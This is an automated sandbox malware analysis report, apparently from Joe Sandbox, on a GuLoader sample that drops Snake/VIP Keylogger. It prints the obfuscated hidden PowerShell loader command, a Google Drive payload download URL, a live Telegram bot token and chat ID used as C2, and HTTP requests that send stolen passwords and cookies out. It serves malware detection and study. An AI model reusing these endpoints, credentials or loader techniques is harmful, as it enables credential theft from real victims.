
Windows Analysis Report
pedido-035241.exe

Overview

General Information

Sample name: pedido-035241.exe
Analysis ID: 1576204
MD5: 68ad57514cfb4e1cb4529556dbbc9b73
SHA1: 3681d090c965cd8af1c7bffd6fe5427e997daa41
SHA256: 4b0c3d89a63dc1f177379ea05642c3c3b377adc560b26c7a41aebd2ed1afe9ac
Tags: exe, user-James_inthe_box

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Found malware configuration
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • pedido-035241.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\pedido-035241.exe" MD5: 68AD57514CFB4E1CB4529556DBBC9B73)
    • powershell.exe (PID: 7392 cmdline: powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 8000 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
CloudEyE, GuLoader | CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendMessage"}
{"Exfil Mode": "Telegram", "Token": "7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw", "Chat_id": "7763958191", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security |
00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
00000006.00000002.2962912276.0000000004C2B000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) ", CommandLine: powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\pedido-035241.exe", ParentImage: C:\Users\user\Desktop\pedido-035241.exe, ParentProcessId: 7320, ParentProcessName: pedido-035241.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) ", ProcessId: 7392, ProcessName: powershell.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 172.217.19.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8000, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49778
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) ", CommandLine: powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\pedido-035241.exe", ParentImage: C:\Users\user\Desktop\pedido-035241.exe, ParentProcessId: 7320, ParentProcessName: pedido-035241.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Veges95=gc -raw 'C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\takelma.Uns';$Makulaturs=$Veges95.SubString(71268,3);.$Makulaturs($Veges95) ", ProcessId: 7392, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-16T16:33:31.824733+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49812 | 104.21.67.152 | 443 | TCP
2024-12-16T16:33:38.136504+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49831 | 104.21.67.152 | 443 | TCP
2024-12-16T16:33:27.235984+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49800 | 193.122.6.168 | 80 | TCP
2024-12-16T16:33:30.173513+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49800 | 193.122.6.168 | 80 | TCP
2024-12-16T16:33:33.267532+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49818 | 193.122.6.168 | 80 | TCP
2024-12-16T16:33:19.318083+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49778 | 172.217.19.174 | 443 | TCP


AV Detection

Source: 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw", "Chat_id": "7763958191", "Version": "4.4"}
Source: msiexec.exe.8000.6.memstrmin; Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendMessage"}
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 97.3% probability

Location Tracking

Source: unknown; DNS query: name: reallyfreegeoip.org
Source: pedido-035241.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49806 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49880 version: TLS 1.2
Source: pedido-035241.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\pedido-035241.exe; Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C13
Source: C:\Users\user\Desktop\pedido-035241.exe; Code function: 0_2_0040683D FindFirstFileW,FindClose, 0_2_0040683D
Source: C:\Users\user\Desktop\pedido-035241.exe; Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 4x nop then jmp 02BEF45Dh, 6_2_02BEF2C0
Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 4x nop then jmp 02BEF45Dh, 6_2_02BEF4AC
Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 4x nop then jmp 02BEFC19h, 6_2_02BEF961

Networking

Source: unknown; DNS query: name: api.telegram.org
Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745773%0D%0ADate%20and%20Time:%2017/12/2024%20/%2018:38:32%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20745773%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendDocument?chat_id=7763958191&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd1f520a1e05ec | Host: api.telegram.org | Content-Length: 581
Source: global traffic; HTTP traffic detected: POST /bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendDocument?chat_id=7763958191&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd1f7597775302 | Host: api.telegram.org | Content-Length: 7046
Source: Joe Sandbox View; IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View; IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View; IP Address: 193.122.6.168 193.122.6.168
Source: Joe Sandbox View; JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown; DNS query: name: checkip.dyndns.org
Source: unknown; DNS query: name: reallyfreegeoip.org
Source: unknown; DNS query: name: checkip.dyndns.org
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49818 -> 193.122.6.168:80
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49800 -> 193.122.6.168:80
Source: Network traffic; Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49778 -> 172.217.19.174:443
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49812 -> 104.21.67.152:443
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49831 -> 104.21.67.152:443
Source: global traffic; HTTP traffic detected: GET /uc?export=download&id=1azRJsiP2GO7H_gWywAD5t_ayrt5FpP0d HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: drive.google.com | Cache-Control: no-cache
Source: global traffic; HTTP traffic detected: GET /download?id=1azRJsiP2GO7H_gWywAD5t_ayrt5FpP0d&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown; HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49806 version: TLS 1.0
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: drive.google.com
Source: global traffic; DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic; DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic; DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic; DNS traffic detected: DNS query: api.telegram.org
Source: unknown; HTTP traffic detected: POST /bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendDocument?chat_id=7763958191&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd1f520a1e05ec | Host: api.telegram.org | Content-Length: 581
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Mon, 16 Dec 2024 15:33:56 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: msiexec.exe, 00000006.00000002.2981297005.0000000024575000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: pedido-035241.exe, pedido-035241.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000243D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: msiexec.exe, 00000006.00000002.2981297005.0000000024575000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244B5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000244B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000244B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:745773%0D%0ADate%20a
            Source: msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7268913379:AAGd-tQ4vpps-mce2n9ECDznKp3DeHYACWw/sendDocument?chat_id=7763
            Source: msiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: msiexec.exe, 00000006.00000002.2981297005.0000000024592000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: msiexec.exe, 00000006.00000002.2981297005.000000002458D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: msiexec.exe, 00000006.00000002.2967421092.00000000088DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: msiexec.exe, 00000006.00000002.2967421092.00000000088DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1azRJsiP2GO7H_gWywAD5t_ayrt5FpP0d
            Source: msiexec.exe, 00000006.00000003.2530503003.0000000008952000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2967421092.0000000008939000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: msiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2967421092.0000000008939000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1azRJsiP2GO7H_gWywAD5t_ayrt5FpP0d&export=download
            Source: msiexec.exe, 00000006.00000002.2967421092.0000000008939000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1azRJsiP2GO7H_gWywAD5t_ayrt5FpP0d&export=download7
Source: msiexec.exe, 00000006.00000002.2967421092.0000000008939000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1azRJsiP2GO7H_gWywAD5t_ayrt5FpP0d&export=download?
Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: msiexec.exe, 00000006.00000002.2981297005.00000000244B5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.000000002448E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.000000002441E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000006.00000002.2981297005.000000002441E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000006.00000002.2981297005.0000000024448000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: msiexec.exe, 00000006.00000002.2981297005.00000000244B5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.000000002448E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.0000000024448000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: msiexec.exe, 00000006.00000003.2471471790.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2528720464.0000000008957000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2471549255.0000000008957000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002551E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002564D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025750000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254A9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: msiexec.exe, 00000006.00000002.2982840463.0000000025484000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002572B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025655000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025628000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254B1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: msiexec.exe, 00000006.00000002.2982840463.000000002569B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002551E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.000000002564D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.0000000025750000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2982840463.00000000254A9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2981297005.00000000244D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
